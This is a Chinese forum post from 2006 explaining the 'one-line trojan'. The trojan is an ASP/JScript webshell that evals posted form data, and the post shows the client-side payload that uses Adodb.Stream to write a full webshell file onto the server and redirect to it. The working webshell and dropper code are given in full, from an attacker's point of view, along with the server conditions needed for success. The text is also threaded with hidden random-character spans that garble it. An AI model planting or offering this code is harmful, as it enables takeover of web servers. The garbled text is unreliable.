首页
Portal
业界资讯
社区
BBS
我的家园
Space
个人空间
导读
Guide
登录
/
注册
用户名
Email
自动登录
找回密码
密码
登录
注册
搜索
搜索
本版
帖子
用户
本版
帖子
用户
帖子
好友
道具
勋章
收藏
任务
淘帖
门户
导读
设置
我的收藏
退出
腾讯QQ
微信登录
首页
›
≡≡网络技术≡≡
›
网络技术
›
一句话木马原理
返回列表
黑客安全
一句话木马原理
[ 复制链接 ]
灰儿
2006-8-12 22:56:19
<SPAN class=tpc_content>就拿我们经常使用的冰狐大哥的一句话木马:<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>来解释下它的原理.<SPAN style="FONT-SIZE: 0pt; COLOR: #ffffff"> V&SrP2D </SPAN> <BR>首先<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行,后面的eval是一句话木马的精华部分,使用eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了Request.form('#')+''这句代码,Request.form('#')的作用是读取客户端文件中html标记属性中name值被命名为#的部分,例如如下摘自一句话客户端的代码:<SPAN style="FONT-SIZE: 0pt; COLOR: #ffffff"> cpiy]m*I </SPAN> <BR><textarea name=# cols="80" rows="10"><SPAN style="FONT-SIZE: 0pt; COLOR: #ffffff"> qu>Uun8|oj </SPAN> <BR>set iP=server.createObject("Adodb.Stream") <SPAN style="FONT-SIZE: 0pt; COLOR: #ffffff">@/ in}t </SPAN> <BR>iP.Open <SPAN style="FONT-SIZE: 0pt; COLOR: #ffffff">:]r47]St </SPAN> <BR>iP.Type=2 <SPAN style="FONT-SIZE: 0pt; COLOR: #ffffff">GwoS>tGd3 </SPAN> <BR>iP.CharSet="gb2312" <SPAN style="FONT-SIZE: 0pt; COLOR: #ffffff">KEq/nio </SPAN> <BR>iP.writetext request("aoyun") <SPAN style="FONT-SIZE: 0pt; COLOR: #ffffff">-F2lfQF </SPAN> <BR>iP.SaveToFile server.mappath("aoyunwan.asp"),2 <SPAN style="FONT-SIZE: 0pt; COLOR: #ffffff">f(e ABq </SPAN> <BR>iP.Close <SPAN style="FONT-SIZE: 0pt; COLOR: #ffffff">3S=< oZX+) </SPAN> <BR>set iP=nothing <SPAN style="FONT-SIZE: 0pt; COLOR: #ffffff">=]y1-O#AP </SPAN> <BR>response.redirect "aoyunwan.asp" <SPAN style="FONT-SIZE: 0pt; COLOR: #ffffff">u LAa$)9 </SPAN> <BR></textarea><SPAN style="FONT-SIZE: 0pt; COLOR: #ffffff"> ,Lf" QqF </SPAN> <BR>学过html的朋友应该注意到了在textarea标记中的name属性被赋值为#,也就是服务器端就是要读取其中的代码(使用Request.form('#')),然后执行(使用eval(Request.form('#')+'')),也就是执行了:<SPAN style="FONT-SIZE: 0pt; COLOR: #ffffff"> N:uid;S!S </SPAN> <BR>set iP=server.createObject("Adodb.Stream") <SPAN style="FONT-SIZE: 0pt; COLOR: #ffffff">jFi. J , </SPAN> <BR>iP.Open <SPAN style="FONT-SIZE: 0pt; COLOR: #ffffff">E-o'l>%Nx </SPAN> <BR>iP.Type=2 <SPAN style="FONT-SIZE: 0pt; COLOR: #ffffff">s\v@K>V* </SPAN> <BR>iP.CharSet="gb2312" <SPAN style="FONT-SIZE: 0pt; COLOR: #ffffff">V5}C<}L </SPAN> <BR>iP.writetext request("aoyun") <SPAN style="FONT-SIZE: 0pt; COLOR: #ffffff">zx%6@ex </SPAN> <BR>iP.SaveToFile server.mappath("aoyunwan.asp"),2 <SPAN style="FONT-SIZE: 0pt; COLOR: #ffffff">[y.ueH1 </SPAN> <BR>iP.Close <SPAN style="FONT-SIZE: 0pt; COLOR: #ffffff">N/,B\f}%z </SPAN> <BR>set iP=nothing <SPAN style="FONT-SIZE: 0pt; COLOR: #ffffff">5xmA4kaxL </SPAN> <BR>response.redirect "aoyunwan.asp" <SPAN style="FONT-SIZE: 0pt; COLOR: #ffffff">*{>y V_j </SPAN> <BR>学过asp的朋友应该看的懂,上面代码的意思是首先创建一个流对象ip,然后使用该对象的writetext方法将request("aoyun")读取过来的内容(就是我们常见的一句话客户端的第二个textarea标记中的内容,也就是我们的大马的代码)写入服务端的 aoyunwan.asp文件中,写入结束后使用set iP=nothing 释放Adodb.Stream对象 然后使用response.redirect "aoyunwan.asp" 转向刚才写入大马代码的文件,也就是我们最后看见的大马了!<SPAN style="FONT-SIZE: 0pt; COLOR: #ffffff"> [ByxN,BB </SPAN> <BR>不过一句话木马能成功的条件依赖于两个条件:一、服务器端没有禁止Adodb.Stream组件,因为我们使用一句话木马写入大马代码的条件是服务器端创建Adodb.Stream组件,如果该组件被禁用的话是不会写入成功的!还有就是权限的问题,如果当前的虚拟目录禁止user组或者everyone写入操作的话那么也是不会成功的.</SPAN>
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
注册
回复
本版积分规则
回帖后跳转到最后一页
浏览过的版块
多媒体技术
数据库
业界资讯
灰儿
管理员
9842篇
主题总数
7
总热度
提问
+关注
产品动态
2024-05-16
泛微E10(e-cology)配置文件详解
2024-05-15
泛微(weaver)e-cology_V10公文管理,启用预览正文和套红预览功能
2024-05-14
泛微E10(e-cology)文件存储位置与打开方式
2024-05-14
神州数码云科(DCN) DCME-320路由器关闭互联网22、23、53端口方法
2024-05-13
关于webapp与WEB-INF的记录
2024-05-13
泛微(weaver)e-cology_V10公文管理,上传套红模板教程
2024-05-13
防火墙指标:吞吐量、时延、新建连接速率、并发连接数
2024-05-13
核心路由器十项性能指标
热点推荐
1
泛微E10(e-cology)配置文件详解
2
泛微(weaver)e-cology_V10公文管理,启用预览正文和套红预览功能
3
泛微E10(e-cology)文件存储位置与打开方式
4
神州数码云科(DCN) DCME-320路由器关闭互联网22、23、53端口方法
5
关于webapp与WEB-INF的记录
6
泛微(weaver)e-cology_V10公文管理,上传套红模板教程
7
防火墙指标:吞吐量、时延、新建连接速率、并发连接数
8
核心路由器十项性能指标
热门板块
PC操作系统
启动和引导
手机操作系统
硬件相关
办公软件
多媒体技术
产品动态
2024-05-16
泛微E10(e-cology)配置文件详解
2024-05-15
泛微(weaver)e-cology_V10公文管理,启用预览正文和套红预览功能
2024-05-14
泛微E10(e-cology)文件存储位置与打开方式
2024-05-14
神州数码云科(DCN) DCME-320路由器关闭互联网22、23、53端口方法
2024-05-13
关于webapp与WEB-INF的记录
2024-05-13
泛微(weaver)e-cology_V10公文管理,上传套红模板教程
2024-05-13
防火墙指标:吞吐量、时延、新建连接速率、并发连接数
2024-05-13
核心路由器十项性能指标
热点推荐
1
泛微E10(e-cology)配置文件详解
2
泛微(weaver)e-cology_V10公文管理,启用预览正文和套红预览功能
3
泛微E10(e-cology)文件存储位置与打开方式
4
神州数码云科(DCN) DCME-320路由器关闭互联网22、23、53端口方法
5
关于webapp与WEB-INF的记录
6
泛微(weaver)e-cology_V10公文管理,上传套红模板教程
7
防火墙指标:吞吐量、时延、新建连接速率、并发连接数
8
核心路由器十项性能指标
热门板块
PC操作系统
启动和引导
手机操作系统
硬件相关
办公软件
多媒体技术
学习中心
站长自定义文字内容,利用碎片时间,随时随地获取优质内容。
Q设计语言
了解更多
Q Design 提供商家设计所需的指导与资源,帮商家快速完成产品设计、降低生产成本。
学习中心
站长自定义文字内容,利用碎片时间,随时随地获取优质内容。
Q设计语言
了解更多
Q Design 提供商家设计所需的指导与资源,帮商家快速完成产品设计、降低生产成本。